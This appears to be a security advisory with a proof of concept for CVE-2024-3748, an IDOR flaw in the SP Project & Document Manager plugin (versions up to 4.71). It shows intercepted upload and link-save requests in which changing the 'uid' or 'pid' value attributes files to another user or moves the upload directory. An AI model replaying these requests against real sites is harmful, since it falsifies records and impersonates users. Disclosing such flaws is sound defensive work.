SP Project & Document Manager <= 4.71 – Data Update via IDOR | CVE 2024-3748

Description

The plugin is missing validation in its upload function, allowing a user to manipulate the `user_id` to make it appear that a file was uploaded by another user

Proof of Concept

1. Select to upload a file through the plugin
2. Intercept the request:

Example:

```

------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="file[]"; filename="IMG_0628.PNG"
Content-Type: image/png

...

------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="action"

sp_file_upload_callback
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="uid"

2(CHANGE HERE)
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
```

Modify the `2(CHANGE HERE)` value and send the request.

Modify the next request body changing `2(CHANGE HERE)` to any user ID:

```
pid=2&action=sp_cdm_link_save_embed&uid=2(CHANGE HERE)&link-name=link1&link-url=http%3A%2F%2Flocalhost%3A8020%2Flink1&dlg-upload-notes=aaa
```

Note: the upload directory can also be manipulated by changing the `pid`